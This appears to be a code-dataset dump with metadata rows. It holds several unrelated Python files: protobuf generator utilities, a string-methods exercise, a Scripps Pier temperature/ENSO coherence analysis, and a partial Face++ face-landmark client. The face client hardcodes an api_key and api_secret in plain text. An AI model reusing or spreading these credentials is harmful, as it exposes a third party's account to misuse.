expanded_type_str = "dict_of_{}_{}".format(sub_type_1, sub_type_2)
else:
expanded_type_str = content_type
protobuf_variable_name = "{}_type_{}".format(content_name, expanded_type_str)
return protobuf_variable_name
def _python_pt_or_ct_type_to_proto_type(content_type: str) -> str:
"""
Convert a PT or CT from python to their protobuf equivalent.
:param content_type: the python type
:return: The protobuf equivalent
"""
if content_type in PYTHON_TYPE_TO_PROTO_TYPE.keys():
proto_type = PYTHON_TYPE_TO_PROTO_TYPE[content_type]
else:
proto_type = content_type
return proto_type
def _includes_custom_type(content_type: str) -> bool:
"""
Evaluate whether a content type is a custom type or has a custom type as a sub-type.
:param content_type: the content type
:return: Boolean result
"""
if content_type.startswith("Optional"):
sub_type = _get_sub_types_of_compositional_types(content_type)[0]
result = _includes_custom_type(sub_type)
elif content_type.startswith("Union"):
sub_types = _get_sub_types_of_compositional_types(content_type)
result = False
for sub_type in sub_types:
if _includes_custom_type(sub_type):
result = True
break
elif (
content_type.startswith("FrozenSet")
or content_type.startswith("Tuple")
or content_type.startswith("Dict")
or content_type in PYTHON_TYPE_TO_PROTO_TYPE.keys()
):
result = False
else:
result = True
return result
def is_installed(programme: str) -> bool:
"""
Check whether a programme is installed on the system.
:param programme: the name of the programme.
:return: True if installed, False otherwise
"""
res = shutil.which(programme)
return res is not None
def base_protolint_command() -> str:
"""
Return the base protolint command.
:return: The base protolint command
"""
if sys.platform.startswith("win"):
protolint_base_cmd = "protolint" # pragma: nocover
else:
protolint_base_cmd = "PATH=${PATH}:${GOPATH}/bin/:~/go/bin protolint"
return protolint_base_cmd
def check_prerequisites() -> None:
"""Check whether a programme is installed on the system."""
# check black code formatter is installed
if not is_installed("black"):
raise FileNotFoundError(
"Cannot find black code formatter! To install, please follow this link: https://black.readthedocs.io/en/stable/installation_and_usage.html"
)
# check isort code formatter is installed
if not is_installed("isort"):
raise FileNotFoundError(
"Cannot find isort code formatter! To install, please follow this link: https://pycqa.github.io/isort/#installing-isort"
)
# check protolint code formatter is installed
if subprocess.call(f"{base_protolint_command()} version", shell=True) != 0: # nosec
raise FileNotFoundError(
"Cannot find protolint protocol buffer schema file linter! To install, please follow this link: https://github.com/yoheimuta/protolint."
)
# check protocol buffer compiler is installed
if not is_installed("protoc"):
raise FileNotFoundError(
"Cannot find protocol buffer compiler! To install, please follow this link: https://developers.google.com/protocol-buffers/"
)
def get_protoc_version() -> str:
"""Get the protoc version used."""
result = subprocess.run( # nosec
["protoc", "--version"], stdout=subprocess.PIPE, check=True
)
result_str = result.stdout.decode("utf-8").strip("\n").strip("\r")
return result_str
def load_protocol_specification(specification_path: str) -> ProtocolSpecification:
"""
Load a protocol specification.
:param specification_path: path to the protocol specification yaml file.
:return: A ProtocolSpecification object
"""
config_loader = ConfigLoader(
"protocol-specification_schema.json", ProtocolSpecification
)
protocol_spec = config_loader.load_protocol_specification(
open_file(specification_path)
)
return protocol_spec
def _create_protocol_file(
path_to_protocol_package: str, file_name: str, file_content: str
) -> None:
"""
Create a file in the generated protocol package.
:param path_to_protocol_package: path to the file
:param file_name: the name of the file
:param file_content: the content of the file
"""
pathname = os.path.join(path_to_protocol_package, file_name)
with open_file(pathname, "w") as file:
file.write(file_content)
def try_run_black_formatting(path_to_protocol_package: str) -> None:
"""
Run Black code formatting via subprocess.
:param path_to_protocol_package: a path where formatting should be applied.
"""
subprocess.run( # nosec
[sys.executable, "-m", "black", path_to_protocol_package, "--quiet"],
check=True,
)
def try_run_isort_formatting(path_to_protocol_package: str) -> None:
"""
Run Isort code formatting via subprocess.
:param path_to_protocol_package: a path where formatting should be applied.
"""
subprocess.run( # nosec
[sys.executable, "-m", "isort", *ISORT_CLI_ARGS, path_to_protocol_package],
check=True,
)
def try_run_protoc(
path_to_generated_protocol_package: str,
name: str,
language: str = PROTOCOL_LANGUAGE_PYTHON,
) -> None:
"""
Run 'protoc' protocol buffer compiler via subprocess.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:param language: the target language in which to compile the protobuf schema file
"""
# for closure-styled imports for JS, comment the first line and uncomment the second
js_commonjs_import_option = (
"import_style=commonjs,binary:" if language == PROTOCOL_LANGUAGE_JS else ""
)
language_part_of_the_command = f"--{language}_out={js_commonjs_import_option}{path_to_generated_protocol_package}"
subprocess.run( # nosec
[
"protoc",
f"-I={path_to_generated_protocol_package}",
language_part_of_the_command,
f"{path_to_generated_protocol_package}/{name}.proto",
],
stderr=subprocess.PIPE,
encoding="utf-8",
check=True,
env=os.environ.copy(),
)
def try_run_protolint(path_to_generated_protocol_package: str, name: str) -> None:
"""
Run 'protolint' linter via subprocess.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
"""
# path to proto file
path_to_proto_file = os.path.join(
path_to_generated_protocol_package,
f"{name}.proto",
)
# Dump protolint configuration into a temporary file
temp_dir = tempfile.mkdtemp()
path_to_configuration_in_tmp_file = Path(
temp_dir, PROTOLINT_CONFIGURATION_FILE_NAME
)
with open_file(path_to_configuration_in_tmp_file, "w") as file:
file.write(PROTOLINT_CONFIGURATION)
# Protolint command
cmd = f'{base_protolint_command()} lint -config_path={path_to_configuration_in_tmp_file} -fix "{path_to_proto_file}"'
# Execute protolint command
subprocess.run( # nosec
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding="utf-8",
check=True,
env=os.environ.copy(),
shell=True,
)
# Delete temporary configuration file
shutil.rmtree(temp_dir) # pragma: no cover
def check_protobuf_using_protoc(
path_to_generated_protocol_package: str, name: str
) -> Tuple[bool, str]:
"""
Check whether a protocol buffer schema file is valid.
Validation is via trying to compile the schema file. If successfully compiled it is valid, otherwise invalid.
If valid, return True and a 'protobuf file is valid' message, otherwise return False and the error thrown by the compiler.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:return: Boolean result and an accompanying message
"""
try:
try_run_protoc(path_to_generated_protocol_package, name)
os.remove(os.path.join(path_to_generated_protocol_package, name + "_pb2.py"))
return True, "protobuf file is valid"
except subprocess.CalledProcessError as e:
pattern = name + ".proto:[0-9]+:[0-9]+: "
error_message = re.sub(pattern, "", e.stderr[:-1])
return False, error_message
def compile_protobuf_using_protoc(
path_to_generated_protocol_package: str, name: str, language: str
) -> Tuple[bool, str]:
"""
Compile a protocol buffer schema file using protoc.
If successfully compiled, return True and a success message,
otherwise return False and the error thrown by the compiler.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:param language: the target language in which to compile the protobuf schema file
:return: Boolean result and an accompanying message
"""
try:
try_run_protoc(path_to_generated_protocol_package, name, language)
return True, "protobuf schema successfully compiled"
except subprocess.CalledProcessError as e:
pattern = name + ".proto:[0-9]+:[0-9]+: "
error_message = re.sub(pattern, "", e.stderr[:-1])
return False, error_message
def apply_protolint(path_to_proto_file: str, name: str) -> Tuple[bool, str]:
"""
Apply protolint linter to a protocol buffer schema file.
If no output, return True and a success message,
otherwise return False and the output shown by the linter
(minus the indentation suggestions which are automatically fixed by protolint).
:param path_to_proto_file: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:return: Boolean result and an accompanying message
"""
try:
try_run_protolint(path_to_proto_file, name)
return True, "protolint has no output"
except subprocess.CalledProcessError as e:
lines_to_show = []
for line in e.stderr.split("\n"):
to_show = True
for whitelist_error_str in PROTOLINT_ERROR_WHITELIST:
if whitelist_error_str in line:
to_show = False
break
if to_show:
lines_to_show.append(line)
error_message = "\n".join(lines_to_show)
return False, error_message
| 35.636678 | 151 | 0.646373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,884 | 0.431304 |
bcd88cb9aee8377371dcb96cf615ef4e2ec10580 | 4,113 | py | Python | exercises/level_0/stringing.py | eliranM98/python_course | d9431dd6c0f27fca8ca052cc2a821ed0b883136c | [
"MIT"
] | 6 | 2019-03-29T06:14:53.000Z | 2021-10-15T23:42:36.000Z | exercises/level_0/stringing.py | eliranM98/python_course | d9431dd6c0f27fca8ca052cc2a821ed0b883136c | [
"MIT"
] | 4 | 2019-09-06T10:03:40.000Z | 2022-03-11T23:30:55.000Z | exercises/level_0/stringing.py | eliranM98/python_course | d9431dd6c0f27fca8ca052cc2a821ed0b883136c | [
"MIT"
] | 12 | 2019-06-20T19:34:52.000Z | 2021-10-15T23:42:39.000Z | text = '''
Victor Hugo's ({}) tale of injustice, heroism and love follows the fortunes of Jean Valjean, an escaped convict determined to put his criminal past behind him. But his attempts to become a respected member of the community are constantly put under threat: by his own conscience, when, owing to a case of mistaken identity, another man is arrested in his place; and by the relentless investigations of the dogged Inspector Javert. It is not simply for himself that Valjean must stay free, however, for he has sworn to protect the baby daughter of Fantine, driven to prostitution by poverty.
Norman Denny's ({}) lively English translation is accompanied by an introduction discussing Hugo's political and artistic aims in writing Les Miserables.
Victor Hugo (1802-85) wrote volumes of criticism, dramas, satirical verse and political journalism but is best remembered for his novels, especially Notre-Dame de Paris (also known as The Hunchback of Notre-Dame) and Les Miserables, which was adapted into one of the most successful musicals of all time.
'All human life is here'
Cameron Mackintosh, producer of the musical Les Miserables
'One of the half-dozen greatest novels of the world'
Upton Sinclair
'A great writer - inventive, witty, sly, innovatory'
A. S. Byatt, author of Possession
'''
name = 'Victor'
word1 = 'writer'
word2 = 'witty'
numbers = "0123456789"
small_letters = 'abcdefghijklmnopqrstuvwxyz'
big_letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
name_index = text.find(name)
name_plus3 = text[name_index: name_index+len(name)+3]
word1_index = text.find(word1, 0, 100)
word2_index = text.find(word2, int(len(text)/2), len(text))
count_characters = text.count('of')
is_text_starts_with_name = text.startswith(name)
is_text_ends_with_name = text.endswith(name)
text = text.format('1822-95', '1807-63')
words = text.split(' ')
text1 = ''.join(words)
text2 = ','.join(words)
text3 = '_'.join(words)
text4 = ' '.join(words)
text5 = text.replace('of', '@🐔')
text6 = text.capitalize()
text7 = text.replace('a', '')
text8 = text.strip()
upper_name = name.upper()
lower_name = name.lower()
is_name_upper = name.isupper()
is_name_lower = name.islower()
is_big_letters_upper = big_letters.isupper()
is_small_letters_lower = small_letters.islower()
stringed_integer = '90'.isnumeric()
stringed_float = '90.5'.isnumeric()
converted_int = int('90')
converted_float = float('90.5')
converted_string = str(183)
is_digit = converted_string[1].isdigit()
edges = small_letters[0] + big_letters[-1]
body = numbers[1:-1]
evens = numbers[::2]
odds = numbers[1::2]
print('name', name)
print('word1', word1)
print('word2', word2)
print('numbers', numbers)
print('small_letters', small_letters)
print('big_letters', big_letters)
print('name_index', name_index)
print('name_plus3', name_plus3)
print('word1_index', word1_index)
print('word2_index', word2_index)
print('count_characters -> \'of\' in the text', count_characters)
print('is_text_starts_with_name', is_text_starts_with_name)
print('is_text_ends_with_name', is_text_ends_with_name)
print('\n\n\n\n\n', 'text', text, '\n\n\n\n\n')
print('\n\n\n\n\n', 'words', words, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text1', text1, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text2', text2, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text3', text3, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text4', text4, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text5', text5, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text6', text6, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text7', text7, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text8', text8, '\n\n\n\n\n')
print('upper_name', upper_name)
print('lower_name', lower_name)
print('is_name_upper', is_name_upper)
print('is_name_lower', is_name_lower)
print('is_big_letters_upper', is_big_letters_upper)
print('is_small_letters_lower', is_small_letters_lower)
print('stringed_integer', stringed_integer)
print('stringed_float', stringed_float)
print('converted_int', converted_int)
print('converted_float', converted_float)
print('converted_string', converted_string)
print('is_digit', is_digit)
print('edges', edges)
print('body', body)
print('evens', evens)
print('odds', odds)
| 41.545455 | 590 | 0.735959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,193 | 0.532799 |
bceaba57987d2038b2b3f984d0fa700547f6902c | 12,224 | py | Python | SIO_Code/SIO_coherence.py | mmstoll/Ocean569_Code | 228cb719f3e82f187f704f343d3b3590a38236d7 | [
"MIT"
] | null | null | null | SIO_Code/SIO_coherence.py | mmstoll/Ocean569_Code | 228cb719f3e82f187f704f343d3b3590a38236d7 | [
"MIT"
] | null | null | null | SIO_Code/SIO_coherence.py | mmstoll/Ocean569_Code | 228cb719f3e82f187f704f343d3b3590a38236d7 | [
"MIT"
] | null | null | null | """
Data: Temperature and Salinity time series from SIO Scripps Pier
Salinity: measured in PSU at the surface (~0.5m) and at depth (~5m)
Temp: measured in degrees C at the surface (~0.5m) and at depth (~5m)
- Timestamp included beginning in 1990
"""
# imports
import sys,os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime
from scipy import signal
import scipy.stats as ss
import SIO_modules as SIO_mod
from importlib import reload
reload(SIO_mod)
# read in temp and sal files
sal_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt', sep='\t', skiprows = 27)
temp_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt', sep='\t', skiprows = 26)
ENSO_data = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')
ENSO_data_recent = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx')
PDO_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv', skiprows = 1)
path_out = '/Users/MMStoll/Python/Output/Ocean569_Output/SIO_Output/'
# convert year, month, day columns to single DATE column
sal_data['DATE'] = pd.to_datetime(sal_data[['YEAR', 'MONTH', 'DAY']])
temp_data['DATE'] = pd.to_datetime(temp_data[['YEAR', 'MONTH', 'DAY']])
ENSO_data_all = ENSO_data.append(ENSO_data_recent[323:], ignore_index = True)
PDO_data['DATE'] = pd.to_datetime(PDO_data['Date'], format='%Y%m')
# remove uncertain data(SURF_FLAG between 1 and 4), replace with NaN, then interpolate
for i in range(0,len(sal_data['SURF_SAL_PSU'])):
if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4):
sal_data['SURF_SAL_PSU'][i] = np.nan
for i in range(0,len(temp_data['SURF_TEMP_C'])):
if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4):
sal_data['SURF_SAL_PSU'][i] = np.nan
# interpolate missing temp and sal data
sal_data['SURF_SAL_PSU'] = sal_data['SURF_SAL_PSU'].interpolate()
temp_data['SURF_TEMP_C'] = temp_data['SURF_TEMP_C'].interpolate()
sal_data['SURF_SAL_PSU'][0] = sal_data['SURF_SAL_PSU'][1]
# remove the average from the sal and temp data and create new columns
sal_data['SURF_SAL_PSU_NOAVG'] = sal_data['SURF_SAL_PSU'] - sal_data['SURF_SAL_PSU'].mean()
temp_data['SURF_TEMP_C_NOAVG'] = temp_data['SURF_TEMP_C'] - temp_data['SURF_TEMP_C'].mean()
# remove trends from the sal and temp data and create new columns
sal_fit = np.polyfit(sal_data.index,sal_data['SURF_SAL_PSU_NOAVG'],1)
sal_fit_fn = np.poly1d(sal_fit)
temp_fit = np.polyfit(temp_data.index,temp_data['SURF_TEMP_C_NOAVG'],1)
temp_fit_fn = np.poly1d(temp_fit)
sal_fit_value = sal_fit_fn(sal_data.index)
temp_fit_value = temp_fit_fn(temp_data.index)
sal_data['SURF_SAL_PSU_DETREND'] = sal_data['SURF_SAL_PSU_NOAVG'] - sal_fit_value
temp_data['SURF_TEMP_C_DETREND'] = temp_data['SURF_TEMP_C_NOAVG'] - temp_fit_value
sal_tri = sal_data['SURF_SAL_PSU_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
temp_tri = temp_data['SURF_TEMP_C_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
# # 1. FFT the SIO Data
# t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_data['SURF_TEMP_C_DETREND'])
# # 2. Apply butterworth filter to SIO data, with cutoff equal to nyquist freq of enso index
# fs = 1 # sampling frequency, once per day
# fc = 1/60 # cut-off frequency of the filter (cut off periods shorter than 60 days)
# w = fc / (fs / 2) #normalize the frequency
# b, a = signal.butter(4, w, 'low')
# temp_output = signal.filtfilt(b, a, t_spec)
# # 3. Inverse FFT of filtered SIO data
# temp_ifft = np.fft.irfft(temp_output,n=len(temp_output))
# # 4. Subsample new SIO time series with same delta t as ENSO index (once per month)
# temp_ifft_sampled = np.mean(temp_ifft[0:18750].reshape(-1, 30), axis=1)
# temp_ifft_len = temp_ifft_sampled[0:618]
# x = np.linspace(0,18770, 18770)
# plt.figure()
# plt.loglog(x, temp_ifft)
# plt.show()
# butterworth low pass filter for temperature and salinity
fs = 1 # sampling frequency, once per day
fc = 1/500 # cut-off frequency of the filter (cut off periods shorter than 500 days)
w = fc / (fs / 2) #normalize the frequency
b, a = signal.butter(4, w, 'low')
temp_output = signal.filtfilt(b, a, temp_tri)
sal_output = signal.filtfilt(b, a, sal_tri)
temp_sampled = np.mean(temp_output[0:37530].reshape(-1, 30), axis=1) #length = 1251
# create dataframe with spectra for each variable
spectra_temp_df = pd.DataFrame(columns = ['Temp_freq', 'Temp_spec', 'Temp_fft'])
spectra_sal_df = pd.DataFrame(columns = ['Sal_freq', 'Sal_spec', 'Sal_fft'])
spectra_PDO_df = pd.DataFrame(columns = ['PDO_freq', 'PDO_spec', 'PDO_fft'])
spectra_ENSO_df = pd.DataFrame(columns = ['ENSO_freq', 'ENSO_spec', 'ENSO_fft'])
# for coherence, start all records at 1916-01-01
# ENSO data [20:] 1916-09-01 onward, monthly// ends now, through 2019-05-01 [:1254]
# Temp data [10:] 1916-09-01 onward, daily // ends 2019-05-31
# PDO data [752:] 1916-09-01 onward, monthly// ends now, thorugh 2019-05-01 [:1985]
# compute spectral variables for each variable
for j in range(0,4):
data_sets = [temp_sampled, sal_data['SURF_SAL_PSU_DETREND'], PDO_data['Value'][743:], ENSO_data_all['VALUE'][14:]]
freq, spec, spec_amp, fft, delt, freq_T, freq_nyquist = SIO_mod.var_fft(data_sets[j])
if j == 0:
spectra_temp_df['Temp_freq'] = freq
spectra_temp_df['Temp_spec'] = spec
spectra_temp_df['Temp_fft'] = fft
if j == 1:
spectra_sal_df['Sal_freq'] = freq
spectra_sal_df['Sal_spec'] = spec
spectra_sal_df['Sal_fft'] = fft
if j == 2:
spectra_PDO_df['PDO_freq'] = freq
spectra_PDO_df['PDO_spec'] = spec
spectra_PDO_df['PDO_fft'] = fft
if j == 3:
spectra_ENSO_df['ENSO_freq'] = freq
spectra_ENSO_df['ENSO_spec'] = spec
spectra_ENSO_df['ENSO_fft'] = fft
def band_average(fft_var1,fft_var2,frequency,n_av):
# fft_var1 and fft_var2 are the inputs computed via fft
# they can be the same variable or different variables
# n_av is the number of bands to be used for smoothing (nice if it is an odd number)
# this function is limnited to 100,000 points but can easily be modified
nmax=100000
# T_length = (len(fft_var1) * 2 - 2)
# define some variables and arrays
n_spec=len(fft_var1)
n_av2=int(n_av//2+1) #number of band averages/2 + 1
spec_amp_av=np.zeros(nmax)
spec_phase_av=np.zeros(nmax)
freq_av=np.zeros(nmax)
# average the lowest frequency bands first (with half as many points in the average)
sum_low_amp=0.
sum_low_phase=0.
count=0
spectrum_amp=np.absolute(fft_var1*np.conj(fft_var2))#/(2.*np.pi*T_length*delt)
spectrum_phase=np.angle(fft_var1*np.conj(fft_var2),deg=True) #/(2.*np.pi*T_length*delt) don't know if I need the 2pi/Tdeltt here...
#
for i in range(0,n_av2):
sum_low_amp+=spectrum_amp[i]
sum_low_phase+=spectrum_phase[i]
spec_amp_av[0]=sum_low_amp/n_av2
spec_phase_av[0]=sum_low_phase/n_av
# compute the rest of the averages
for i in range(n_av2,n_spec-n_av,n_av):
count+=1
spec_amp_est=np.mean(spectrum_amp[i:i+n_av])
spec_phase_est=np.mean(spectrum_phase[i:i+n_av])
freq_est=frequency[i+n_av//2]
spec_amp_av[count]=spec_amp_est
spec_phase_av[count]=spec_phase_est
freq_av[count]=freq_est
# omega0 = 2.*np.pi/(T_length*delt)
# contract the arrays
spec_amp_av=spec_amp_av[0:count]
spec_phase_av=spec_phase_av[0:count]
freq_av=freq_av[0:count]
return spec_amp_av,spec_phase_av,freq_av,count
n_av = 5
# define terms to compute coherence between temp and ENSO
t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
e_spec_b,e_phase_b,e_freq_av_b,count=band_average(spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_freq'],n_av)
e_fft_star = np.conj(spectra_ENSO_df['ENSO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,e_fft_star,spectra_ENSO_df['ENSO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*e_spec_b)
# define colors
t_color = 'cadetblue'
s_color = 'darkslateblue'
p_color = 'seagreen'
e_color = 'steelblue'
freq_ann = 2*np.pi/365.25
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and ENSO Index \nCoherence and Phase'
im_name = 'SIO_TempENSO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = e_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{ENSO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = e_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{ENSO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
n_av = 5
# define terms to compute coherence between temp and ENSO
#t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
#t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
p_spec_b,p_phase_b,p_freq_av_b,count=band_average(spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_freq'],n_av)
p_fft_star = np.conj(spectra_PDO_df['PDO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,p_fft_star,spectra_PDO_df['PDO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*p_spec_b)
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and PDO Index \nCoherence and Phase'
im_name = 'SIO_TempPDO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = p_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{PDO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = p_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{PDO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
| 47.015385 | 156 | 0.724967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,673 | 0.464087 |
bcf0d2ce383dabf5df66eb0e8657dcde75189cda | 8,894 | py | Python | core/recognizer.py | awen1988/yry | b65ccd7062d60f605fc978a87e060d0015cf1d4c | [
"Apache-2.0"
] | 129 | 2017-11-14T07:20:33.000Z | 2021-06-18T07:07:18.000Z | core/recognizer.py | awen1988/yry | b65ccd7062d60f605fc978a87e060d0015cf1d4c | [
"Apache-2.0"
] | 10 | 2018-04-18T08:01:09.000Z | 2018-08-17T02:57:33.000Z | core/recognizer.py | awen1988/yry | b65ccd7062d60f605fc978a87e060d0015cf1d4c | [
"Apache-2.0"
] | 35 | 2017-11-14T07:17:00.000Z | 2021-01-21T08:10:07.000Z | """
recognize face landmark
"""
import json
import os
import requests
import numpy as np
FACE_POINTS = list(range(0, 83))
JAW_POINTS = list(range(0, 19))
LEFT_EYE_POINTS = list(range(19, 29))
LEFT_BROW_POINTS = list(range(29, 37))
MOUTH_POINTS = list(range(37, 55))
NOSE_POINTS = list(range(55, 65))
RIGHT_EYE_POINTS = list(range(65, 75))
RIGHT_BROW_POINTS = list(range(75, 83))
LEFT_FACE = list(range(0, 10)) + list(range(29, 34))
RIGHT_FACE = list(range(9, 19)) + list(range(75, 80))
JAW_END = 19
FACE_START = 0
FACE_END = 83
OVERLAY_POINTS = [
LEFT_FACE,
RIGHT_FACE,
JAW_POINTS,
]
def face_points(image):
points = []
txt = image + '.txt'
if os.path.isfile(txt):
with open(txt) as file:
for line in file:
points = line
elif os.path.isfile(image):
points = landmarks_by_face__(image)
with open(txt, 'w') as file:
file.write(str(points))
faces = json.loads(points)['faces']
if len(faces) == 0:
err = 404
else:
err = 0
matrix_list = np.matrix(matrix_marks(faces[0]['landmark']))
point_list = []
for p in matrix_list.tolist():
point_list.append((int(p[0]), int(p[1])))
return matrix_list, point_list, err
def landmarks_by_face__(image):
url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'
params = {
'api_key': 'ZBbrYf41rX5AJ2mVDEcdIERF7HOlpG6t',
'api_secret': 'G5qlzXk7Wd9iE6MlORYPRulJ2lihdt9U',
'return_landmark': 1,
}
file = {'image_file': open(image, 'rb')}
r = requests.post(url=url, files=file, data=params)
if r.status_code == requests.codes.ok:
return r.content.decode('utf-8')
else:
return r.content
def matrix_rectangle(left, top, width, height):
pointer = [
(left, top),
(left + width / 2, top),
(left + width - 1, top),
(left + width - 1, top + height / 2),
(left, top + height / 2),
(left, top + height - 1),
(left + width / 2, top + height - 1),
(left + width - 1, top + height - 1)
]
return pointer
def matrix_marks(res):
pointer = [
[res['contour_left1']['x'], res['contour_left1']['y']],
[res['contour_left2']['x'], res['contour_left2']['y']],
[res['contour_left3']['x'], res['contour_left3']['y']],
[res['contour_left4']['x'], res['contour_left4']['y']],
[res['contour_left5']['x'], res['contour_left5']['y']],
[res['contour_left6']['x'], res['contour_left6']['y']],
[res['contour_left7']['x'], res['contour_left7']['y']],
[res['contour_left8']['x'], res['contour_left8']['y']],
[res['contour_left9']['x'], res['contour_left9']['y']],
[res['contour_chin']['x'], res['contour_chin']['y']],
[res['contour_right9']['x'], res['contour_right9']['y']],
[res['contour_right8']['x'], res['contour_right8']['y']],
[res['contour_right7']['x'], res['contour_right7']['y']],
[res['contour_right6']['x'], res['contour_right6']['y']],
[res['contour_right5']['x'], res['contour_right5']['y']],
[res['contour_right4']['x'], res['contour_right4']['y']],
[res['contour_right3']['x'], res['contour_right3']['y']],
[res['contour_right2']['x'], res['contour_right2']['y']],
[res['contour_right1']['x'], res['contour_right1']['y']],
[res['left_eye_bottom']['x'], res['left_eye_bottom']['y']],
[res['left_eye_center']['x'], res['left_eye_center']['y']],
[res['left_eye_left_corner']['x'], res['left_eye_left_corner']['y']],
